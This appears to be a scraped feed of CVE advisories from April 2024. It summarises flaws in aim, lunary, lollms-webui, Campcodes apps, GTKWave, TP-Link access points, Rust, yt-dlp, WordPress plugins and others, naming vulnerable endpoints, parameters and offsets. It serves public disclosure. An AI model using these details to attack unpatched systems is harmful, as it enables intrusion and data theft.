🚨 CVE-2024-2195A critical Remote Code Execution (RCE) vulnerability was identified in the aimhubio/aim project, specifically within the `/api/runs/search/run/` endpoint, affecting versions >= 3.0.0. The vulnerability resides in the `run_search_api` function of the `aim/web/api/runs/views.py` file, where improper restriction of user access to the `RunView` object allows for the execution of arbitrary code via the `query` parameter. This issue enables attackers to execute arbitrary commands on the server, potentially leading to full system compromise.🎖@cveNotify |
|
| 2024-04-10 17:37:35 |
🚨 CVE-2024-1902lunary-ai/lunary is vulnerable to a session reuse attack, allowing a removed user to change the organization name without proper authorization. The vulnerability stems from the lack of validation to check if a user is still part of an organization before allowing them to make changes. An attacker can exploit this by using an old authorization token to send a PATCH request, modifying the organization's name even after being removed from the organization. This issue is due to incorrect synchronization and affects the orgs.patch route.🎖@cveNotify |
|
| 2024-04-10 17:37:31 |
🚨 CVE-2024-1740In lunary-ai/lunary version 1.0.1, a vulnerability exists where a user removed from an organization can still read, create, modify, and delete logs by re-using an old authorization token. The lunary web application communicates with the server using an 'Authorization' token in the browser, which does not properly invalidate upon the user's removal from the organization. This allows the removed user to perform unauthorized actions on logs and access project and external user details without valid permissions.🎖@cveNotify |
|
| 2024-04-10 17:37:30 |
🚨 CVE-2024-1643By knowing an organization's ID, an attacker can join the organization without permission and gain the ability to read and modify all data within that organization. This vulnerability allows unauthorized access and modification of sensitive information, posing a significant security risk. The flaw is due to insufficient verification of user permissions when joining an organization.🎖@cveNotify |
|
| 2024-04-10 17:37:29 |
🚨 CVE-2024-1625An Insecure Direct Object Reference (IDOR) vulnerability exists in the lunary-ai/lunary application version 0.3.0, allowing unauthorized deletion of any organization's project. The vulnerability is due to insufficient authorization checks in the project deletion endpoint, where the endpoint fails to verify if the project ID provided in the request belongs to the requesting user's organization. As a result, an attacker can delete projects belonging to any organization by sending a crafted DELETE request with the target project's ID. This issue affects the project deletion functionality implemented in the projects.delete route.🎖@cveNotify |
|
| 2024-04-10 17:37:26 |
🚨 CVE-2024-1602parisneo/lollms-webui is vulnerable to stored Cross-Site Scripting (XSS) that leads to Remote Code Execution (RCE). The vulnerability arises due to inadequate sanitization and validation of model output data, allowing an attacker to inject malicious JavaScript code. This code can be executed within the user's browser context, enabling the attacker to send a request to the `/execute_code` endpoint and establish a reverse shell to the attacker's host. The issue affects various components of the application, including the handling of user input and model output.🎖@cveNotify |
|
| 2024-04-10 17:37:25 |
🚨 CVE-2024-1520An OS Command Injection vulnerability exists in the '/open_code_folder' endpoint of the parisneo/lollms-webui application, due to improper validation of user-supplied input in the 'discussion_id' parameter. Attackers can exploit this vulnerability by injecting malicious OS commands, leading to unauthorized command execution on the underlying operating system. This could result in unauthorized access, data leakage, or complete system compromise.🎖@cveNotify |
|
| 2024-04-10 17:37:24 |
🚨 CVE-2024-1511The parisneo/lollms-webui repository is susceptible to a path traversal vulnerability due to inadequate validation of user-supplied file paths. This flaw allows an unauthenticated attacker to read, write, and in certain configurations execute arbitrary files on the server by exploiting various endpoints. The vulnerability can be exploited even when the service is bound to localhost, through cross-site requests facilitated by malicious HTML/JS pages.🎖@cveNotify |
|
| 2024-04-10 16:37:24 |
🚨 CVE-2021-46926In the Linux kernel, the following vulnerability has been resolved:ALSA: hda: intel-sdw-acpi: harden detection of controllerThe existing code currently sets a pointer to an ACPI handle beforechecking that it's actually a SoundWire controller. This can lead toissues where the graph walk continues and eventually fails, but thepointer was set already.This patch changes the logic so that the information provided tothe caller is set when a controller is found.🎖@cveNotify |
|
| 2024-04-10 15:37:25 |
🚨 CVE-2021-46922In the Linux kernel, the following vulnerability has been resolved:KEYS: trusted: Fix TPM reservation for seal/unsealThe original patch 8c657a0590de ("KEYS: trusted: Reserve TPM for sealand unseal operations") was correct on the mailing list:https://lore.kernel.org/linux-integrity/20210128235621.127925-4-jarkko@kernel.org/But somehow got rebased so that the tpm_try_get_ops() intpm2_seal_trusted() got lost. This causes an imbalanced put of theTPM ops and causes oopses on TIS based hardware.This fix puts back the lost tpm_try_get_ops()🎖@cveNotify |
|
| 2024-04-10 15:37:24 |
🚨 CVE-2023-33580Phpgurukul Student Study Center Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in the "Admin Name" field on Admin Profile page.🎖@cveNotify |
|
| 2024-04-10 15:07:42 |
🚨 CVE-2024-3541A vulnerability classified as problematic has been found in Campcodes Church Management System 1.0. This affects an unknown part of the file /admin/admin_user.php. The manipulation of the argument firstname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259911.🎖@cveNotify |
|
| 2024-04-10 15:07:41 |
🚨 CVE-2024-3538A vulnerability was found in Campcodes Church Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/addTithes.php. The manipulation of the argument na leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259908.🎖@cveNotify |
|
| 2024-04-10 15:07:37 |
🚨 CVE-2024-3536A vulnerability has been found in Campcodes Church Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/delete_log.php. The manipulation of the argument selector leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259906 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-10 15:07:36 |
🚨 CVE-2024-3534A vulnerability, which was classified as critical, has been found in Campcodes Church Management System 1.0. Affected by this issue is some unknown functionality of the file login.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259904.🎖@cveNotify |
|
| 2024-04-10 15:07:35 |
🚨 CVE-2024-3533A vulnerability classified as problematic was found in Campcodes Complete Online Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file academic_year_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259903.🎖@cveNotify |
|
| 2024-04-10 15:07:32 |
🚨 CVE-2024-3531A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file courses_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259901 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-10 15:07:31 |
🚨 CVE-2024-3529A vulnerability was found in Campcodes Complete Online Student Management System 1.0. It has been classified as problematic. This affects an unknown part of the file students_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259899.🎖@cveNotify |
|
| 2024-04-10 15:07:30 |
🚨 CVE-2024-3528A vulnerability was found in Campcodes Complete Online Student Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file units_view.php. The manipulation of the argument FirstRecord leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259898 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-10 15:07:27 |
🚨 CVE-2024-3526A vulnerability has been found in Campcodes Online Event Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument msg leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259897 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-10 15:07:26 |
🚨 CVE-2021-46920In the Linux kernel, the following vulnerability has been resolved:dmaengine: idxd: Fix clobbering of SWERR overflow bit on writebackCurrent code blindly writes over the SWERR and the OVERFLOW bits. Writeback the bits actually read instead so the driver avoids clobbering theOVERFLOW bit that comes after the register is read.🎖@cveNotify |
|
| 2024-04-10 14:37:41 |
🚨 CVE-2024-3448Users with low privileges can perform certain AJAX actions. In this vulnerability instance, improper access to ajax?action=plugin:focus:checkIframeAvailability leads to a Server-Side Request Forgery by analyzing the error messages returned from the back-end. Allowing an attacker to perform a port scan in the back-end. At the time of publication of the CVE no patch is available.🎖@cveNotify |
|
| 2024-04-10 14:37:38 |
🚨 CVE-2024-2731Users with low privileges (all permissions deselected in the administrator permissions settings) can view certain pages that expose sensitive information such as company names, users' names and surnames, stage names, and monitoring campaigns and their descriptions. In addition, unprivileged users can see and edit the descriptions of tags. At the time of publication of the CVE no patch is available.🎖@cveNotify |
|
| 2024-04-10 14:37:37 |
🚨 CVE-2024-23083Time4J Base v5.9.3 was discovered to contain a NullPointerException via the component net.time4j.format.internal.FormatUtils::useDefaultWeekmodel(Locale).🎖@cveNotify |
|
| 2024-04-10 14:37:36 |
🚨 CVE-2021-46916In the Linux kernel, the following vulnerability has been resolved:ixgbe: Fix NULL pointer dereference in ethtool loopback testThe ixgbe driver currently generates a NULL pointer dereference whenperforming the ethtool loopback test. This is due to the fact that thereisn't a q_vector associated with the test ring when it is setup asinterrupts are not normally added to the test rings.To address this I have added code that will check for a q_vector beforereturning a napi_id value. If a q_vector is not present it will return avalue of 0.🎖@cveNotify |
|
| 2024-04-10 00:37:36 |
🚨 CVE-2024-3525A vulnerability, which was classified as problematic, was found in Campcodes Online Event Management System 1.0. Affected is an unknown function of the file /views/index.php. The manipulation of the argument msg leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259896.🎖@cveNotify |
|
| 2024-04-10 00:37:35 |
🚨 CVE-2024-3119A buffer overflow vulnerability exists in all versions of sngrep since v0.4.2, due to improper handling of 'Call-ID' and 'X-Call-ID' SIP headers. The functions sip_get_callid and sip_get_xcallid in sip.c use the strncpy function to copy header contents into fixed-size buffers without checking the data length. This flaw allows remote attackers to execute arbitrary code or cause a denial of service (DoS) through specially crafted SIP messages.🎖@cveNotify |
|
| 2024-04-10 00:37:34 |
🚨 CVE-2023-40148Server-side request forgery (SSRF) in PingFederate allows unauthenticated http requests to attack network resources and consume server-side resources via forged HTTP POST requests.🎖@cveNotify |
|
| 2024-04-09 23:37:25 |
🚨 CVE-2024-3522A vulnerability classified as critical has been found in Campcodes Online Event Management System 1.0. This affects an unknown part of the file /api/process.php. The manipulation of the argument userId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259893 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-09 23:37:24 |
🚨 CVE-2024-3313SUBNET Solutions Inc. has identified vulnerabilities in third-party components used in PowerSYSTEM Server 2021 and Substation Server 2021.🎖@cveNotify |
|
| 2024-04-09 21:37:44 |
🚨 CVE-2023-35961Multiple OS command injection vulnerabilities exist in the decompression functionality of GTKWave 3.3.115. A specially crafted wave file can lead to arbitrary command execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns decompression in `vcd_recorder_main`.🎖@cveNotify |
|
| 2024-04-09 21:37:38 |
🚨 CVE-2023-35960Multiple OS command injection vulnerabilities exist in the decompression functionality of GTKWave 3.3.115. A specially crafted wave file can lead to arbitrary command execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns legacy decompression in `vcd_main`.🎖@cveNotify |
|
| 2024-04-09 21:37:37 |
🚨 CVE-2023-35957Multiple heap-based buffer overflow vulnerabilities exist in the fstReaderIterBlocks2 VCDATA parsing functionality of GTKWave 3.3.115. A specially-crafted .fst file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the decompression function `uncompress`.🎖@cveNotify |
|
| 2024-04-09 21:37:36 |
🚨 CVE-2023-35956Multiple heap-based buffer overflow vulnerabilities exist in the fstReaderIterBlocks2 VCDATA parsing functionality of GTKWave 3.3.115. A specially-crafted .fst file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the decompression function `fastlz_decompress`.🎖@cveNotify |
|
| 2024-04-09 21:37:32 |
🚨 CVE-2023-35704Multiple stack-based buffer overflow vulnerabilities exist in the FST LEB128 varint functionality of GTKWave 3.3.115. A specially crafted .fst file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the fstReaderVarint32WithSkip function.🎖@cveNotify |
|
| 2024-04-09 21:37:31 |
🚨 CVE-2023-35128An integer overflow vulnerability exists in the fstReaderIterBlocks2 time_table tsec_nitems functionality of GTKWave 3.3.115. A specially crafted .fst file can lead to memory corruption. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-09 21:37:26 |
🚨 CVE-2023-35004An integer overflow vulnerability exists in the VZT longest_len value allocation functionality of GTKWave 3.3.115. A specially crafted .vzt file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-09 21:37:25 |
🚨 CVE-2023-32650An integer overflow vulnerability exists in the FST_BL_GEOM parsing maxhandle functionality of GTKWave 3.3.115, when compiled as a 32-bit binary. A specially crafted .fst file can lead to memory corruption. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-09 20:37:25 |
🚨 CVE-2024-3446A double free vulnerability was found in QEMU virtio devices (virtio-gpu, virtio-serial-bus, virtio-crypto), where the mem_reentrancy_guard flag insufficiently protects against DMA reentrancy issues. This issue could allow a malicious privileged guest to crash the QEMU process on the host, resulting in a denial of service or allow arbitrary code execution within the context of the QEMU process on the host.🎖@cveNotify |
|
| 2024-04-09 20:37:24 |
🚨 CVE-2024-27665Unifiedtransform v2.X is vulnerable to Stored Cross-Site Scripting (XSS) via file upload feature in Syllabus module.🎖@cveNotify |
|
| 2024-04-09 19:37:42 |
🚨 CVE-2024-0872The Watu Quiz plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.1 via the watu-userinfo shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive user meta data which can include session tokens and user emails.🎖@cveNotify |
|
| 2024-04-09 19:37:41 |
🚨 CVE-2024-0626The WooCommerce Clover Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callback_handler function in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to mark orders as paid.🎖@cveNotify |
|
| 2024-04-09 19:37:40 |
🚨 CVE-2024-0598The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form message settings in all versions up to and including 3.2.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This primarily affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-04-09 19:37:37 |
🚨 CVE-2024-0588The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing nonce validation on the pmpro_lifter_save_streamline_option() function. This makes it possible for unauthenticated attackers to enable the streamline setting with Lifter LMS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-04-09 19:37:36 |
🚨 CVE-2023-6999The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Remote Code Exxecution via shortcode in all versions up to, and including, 3.0.10 (with the exception of 2.7.31.2, 2.8.23.2, 2.9.19.2). This makes it possible for authenticated attackers, with contributor level access or higher, to execute code on the server.🎖@cveNotify |
|
| 2024-04-09 19:37:35 |
🚨 CVE-2023-6993The Custom post types, Custom Fields & more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and custom post meta in all versions up to, and including, 5.0.4 due to insufficient input sanitization and output escaping on user supplied post meta values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-09 19:37:32 |
🚨 CVE-2023-6967The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to SQL Injection via shortcode in all versions up to, and including, 3.0.10 (with the exception of 2.7.31.2, 2.8.23.2, 2.9.19.2) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor level access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-04-09 19:37:31 |
🚨 CVE-2023-6964The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.1.26 via the 'kadence_import_get_new_connection_data' AJAX action. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-04-09 19:37:30 |
🚨 CVE-2023-6777The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to unauthenticated API key disclosure in versions up to, and including, 9.0.34 due to the plugin adding the API key to several plugin files. This makes it possible for unauthenticated attackers to obtain the developer's Google API key. While this does not affect the security of sites using this plugin, it allows unauthenticated attackers to make requests using this API key with the potential of exhausting requests resulting in an inability to use the map functionality offered by the plugin.🎖@cveNotify |
|
| 2024-04-09 19:37:26 |
🚨 CVE-2023-6694The Beaver Themer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.4.9 due to insufficient input sanitization and output escaping on user supplied custom fields. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-09 19:37:25 |
🚨 CVE-2024-2921Improper access control in PAM vault permissions in Devolutions Server 2024.1.10.0 and earlier allows an authenticated user with access to the PAM to access unauthorized PAM entries via a specific set of permissions.🎖@cveNotify |
|
| 2024-04-09 18:37:38 |
🚨 CVE-2024-31507Sourcecodester Online Graduate Tracer System v1.0 is vulnerable to SQL Injection via the "request" parameter in admin/fetch_gendercs.php.🎖@cveNotify |
|
| 2024-04-09 18:37:37 |
🚨 CVE-2024-31457gin-vue-admin is a backstage management system based on vue and gin, which separates the front and rear of the full stack. gin-vue-admin pseudoversion 0.0.0-20240407133540-7bc7c3051067, corresponding to version 2.6.1, has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the `plugName` parameter. They can create specific folders such as `api`, `config`, `global`, `model`, `router`, `service`, and `main.go` function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter. The main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct. Pseudoversion 0.0.0-20240409100909-b1b7427c6ea6, corresponding to commit b1b7427c6ea6c7a027fa188c6be557f3795e732b, contains a patch for the issue. As a workaround, one may manually use a filtering method available in the GitHub Security Advisory to rectify the directory traversal problem.🎖@cveNotify |
|
| 2024-04-09 18:37:36 |
🚨 CVE-2024-31454PsiTransfer is an open source, self-hosted file sharing solution. Prior to version 2.2.0, the absence of restrictions on the endpoint, which is designed for uploading files, allows an attacker who received the id of a file distribution to change the files that are in this distribution. The vulnerability allows an attacker to influence those users who come to the file distribution after them and slip the victim files with a malicious or phishing signature. Version 2.2.0 contains a patch for this issue.CVE-2024-31454 allows users to violate the integrity of a file that is uploaded by another user. In this case, additional files are not loaded into the file bucket. Violation of integrity at the level of individual files. While the vulnerability with the number CVE-2024-31453 allows users to violate the integrity of a file bucket without violating the integrity of files uploaded by other users. Thus, vulnerabilities are reproduced differently, require different security recommendations and affect different objects of the application’s business logic.🎖@cveNotify |
|
| 2024-04-09 18:37:35 |
🚨 CVE-2024-31453PsiTransfer is an open source, self-hosted file sharing solution. Prior to version 2.2.0, the absence of restrictions on the endpoint, which allows users to create a path for uploading a file in a file distribution, allows an attacker to add arbitrary files to the distribution. The vulnerability allows an attacker to influence those users who come to the file distribution after them and slip the victim files with a malicious or phishing signature. Version 2.2.0 contains a patch for the issue.CVE-2024-31453 allows users to violate the integrity of a file bucket and upload new files there, while the vulnerability with the number CVE-2024-31454 allows users to violate the integrity of a single file that is uploaded by another user by writing data there and not allows you to upload new files to the bucket. Thus, vulnerabilities are reproduced differently, require different security recommendations and affect different objects of the application’s business logic.🎖@cveNotify |
|
| 2024-04-09 18:37:32 |
🚨 CVE-2024-30704An insecure deserialization vulnerability has been identified in ROS2 Galactic Geochelone ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code and obtain sensitive information via crafted input to the Data Serialization and Deserialization Components, Inter-Process Communication Mechanisms, and Network Communication Interfaces.🎖@cveNotify |
|
| 2024-04-09 18:37:31 |
🚨 CVE-2024-30702An issue was discovered in ROS2 Galactic Geochelone in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code via packages or nodes within the ROS2 system.🎖@cveNotify |
|
| 2024-04-09 18:37:30 |
🚨 CVE-2024-27242Cross site scripting in Zoom Desktop Client for Linux before version 5.17.10 may allow an authenticated user to conduct a denial of service via network access.🎖@cveNotify |
|
| 2024-04-09 18:37:26 |
🚨 CVE-2024-25115RedisBloom adds a set of probabilistic data structures to Redis. Starting in version 2.0.0 and prior to version 2.4.7 and 2.6.10, specially crafted `CF.LOADCHUNK` commands may be used by authenticated users to perform heap overflow, which may lead to remote code execution. The problem is fixed in RedisBloom 2.4.7 and 2.6.10.🎖@cveNotify |
|
| 2024-04-09 18:37:25 |
🚨 CVE-2024-24576Rust is a programming language. The Rust Security Response WG was notified that the Rust standard library prior to version 1.77.2 did not properly escape arguments when invoking batch files (with the `bat` and `cmd` extensions) on Windows using the `Command`. An attacker able to control the arguments passed to the spawned process could execute arbitrary shell commands by bypassing the escaping. The severity of this vulnerability is critical for those who invoke batch files on Windows with untrusted arguments. No other platform or use is affected.The `Command::arg` and `Command::args` APIs state in their documentation that the arguments will be passed to the spawned process as-is, regardless of the content of the arguments, and will not be evaluated by a shell. This means it should be safe to pass untrusted input as an argument.On Windows, the implementation of this is more complex than other platforms, because the Windows API only provides a single string containing all the arguments to the spawned process, and it's up to the spawned process to split them. Most programs use the standard C run-time argv, which in practice results in a mostly consistent way arguments are splitted.One exception though is `cmd.exe` (used among other things to execute batch files), which has its own argument splitting logic. That forces the standard library to implement custom escaping for arguments passed to batch files. Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution.Due to the complexity of `cmd.exe`, we didn't identify a solution that would correctly escape arguments in all cases. To maintain our API guarantees, we improved the robustness of the escaping code, and changed the `Command` API to return an [`InvalidInput`][4] error when it cannot safely escape an argument. This error will be emitted when spawning the process.The fix is included in Rust 1.77.2. Note that the new escaping logic for batch files errs on the conservative side, and could reject valid arguments. Those who implement the escaping themselves or only handle trusted inputs on Windows can also use the `CommandExt::raw_arg` method to bypass the standard library's escaping logic.🎖@cveNotify |
|
| 2024-04-09 18:37:24 |
🚨 CVE-2024-22423yt-dlp is a youtube-dl fork with additional features and fixes. The patch that addressed CVE-2023-40581 attempted to prevent RCE when using `--exec` with `%q` by replacing double quotes with two double quotes. However, this escaping is not sufficient, and still allows expansion of environment variables. Support for output template expansion in `--exec`, along with this vulnerable behavior, was added to `yt-dlp` in version 2021.04.11. yt-dlp version 2024.04.09 fixes this issue by properly escaping `%`. It replaces them with `%%cd:~,%`, a variable that expands to nothing, leaving only the leading percent. It is recommended to upgrade yt-dlp to version 2024.04.09 as soon as possible. Also, always be careful when using `--exec`, because while this specific vulnerability has been patched, using unvalidated input in shell commands is inherently dangerous. For Windows users who are not able to upgrade, avoid using any output template expansion in `--exec` other than `{}` (filepath); if expansion in `--exec` is needed, verify the fields you are using do not contain `"`, `|` or `&`; and/or instead of using `--exec`, write the info json and load the fields from it instead.🎖@cveNotify |
|
| 2024-04-09 17:37:42 |
🚨 CVE-2024-20685Azure Private 5G Core Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-04-09 17:37:41 |
🚨 CVE-2024-20670Outlook for Windows Spoofing Vulnerability🎖@cveNotify |
|
| 2024-04-09 17:37:40 |
🚨 CVE-2024-20669Secure Boot Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-04-09 17:37:37 |
🚨 CVE-2024-20665BitLocker Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-04-09 17:37:36 |
🚨 CVE-2023-49912A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `profile` parameter at offset `0x4224b0` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.🎖@cveNotify |
|
| 2024-04-09 17:37:35 |
🚨 CVE-2023-49910A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `ssid` parameter at offset `0x42247c` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.🎖@cveNotify |
|
| 2024-04-09 17:37:31 |
🚨 CVE-2023-49907A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `band` parameter at offset `0x0045aad8` of the `httpd_portal` binary shipped with v5.1.0 Build 20220926 of the EAP225.🎖@cveNotify |
|
| 2024-04-09 17:37:30 |
🚨 CVE-2023-49134A command execution vulnerability exists in the tddpd enable_test_mode functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926 and Tp-Link N300 Wireless Access Point (EAP115 V4) v5.0.4 Build 20220216. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.This vulnerability impacts `uclited` on the EAP115(V4) 5.0.4 Build 20220216 of the N300 Wireless Gigabit Access Point.🎖@cveNotify |
|
| 2024-04-09 17:37:26 |
🚨 CVE-2023-49074A denial of service vulnerability exists in the TDDP functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of network requests can lead to reset to factory settings. An attacker can send a sequence of unauthenticated packets to trigger this vulnerability.🎖@cveNotify |
|
| 2024-04-09 17:37:25 |
🚨 CVE-2024-29981Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-04-09 17:37:24 |
🚨 CVE-2024-29049Microsoft Edge (Chromium-based) Webview2 Spoofing Vulnerability🎖@cveNotify |
|
| 2024-04-09 16:37:29 |
🚨 CVE-2024-3281A vulnerability was discovered in the firmware builds after 8.0.2.3267 and prior to 8.1.3.1301 in CCX devices. A flaw in the firmware build process did not properly restrict access to a resource from an unauthorized actor.🎖@cveNotify |
|
| 2024-04-09 16:37:26 |
🚨 CVE-2024-31868Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.The attackers can modify helium.json and exposure XSS attacks to normal users.This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.🎖@cveNotify |
|
| 2024-04-09 16:37:25 |
🚨 CVE-2024-31864Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin.The attacker can inject sensitive configuration or malicious code when connecting MySQL database via JDBC driver.This issue affects Apache Zeppelin: before 0.11.1.Users are recommended to upgrade to version 0.11.1, which fixes the issue.🎖@cveNotify |
|
| 2024-04-09 16:37:24 |
🚨 CVE-2024-28235Contao is an open source content management system. Starting in version 4.9.0 and prior to versions 4.13.40 and 5.3.4, when checking for broken links on protected pages, Contao sends the cookie header to external urls as well, the passed options for the http client are used for all requests. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. As a workaround, disable crawling protected pages.🎖@cveNotify |
|
| 2024-04-09 15:37:54 |
🚨 CVE-2023-49912A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `profile` parameter at offset `0x4224b0` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.🎖@cveNotify |
|
| 2024-04-09 15:37:53 |
🚨 CVE-2023-49910A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `ssid` parameter at offset `0x42247c` of the `httpd` binary shipped with v5.0.4 Build 20220216 of the EAP115.🎖@cveNotify |
|
| 2024-04-09 15:37:50 |
🚨 CVE-2023-49909A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `action` parameter at offset `0x0045ab38` of the `httpd_portal` binary shipped with v5.1.0 Build 20220926 of the EAP225.🎖@cveNotify |
|
| 2024-04-09 15:37:49 |
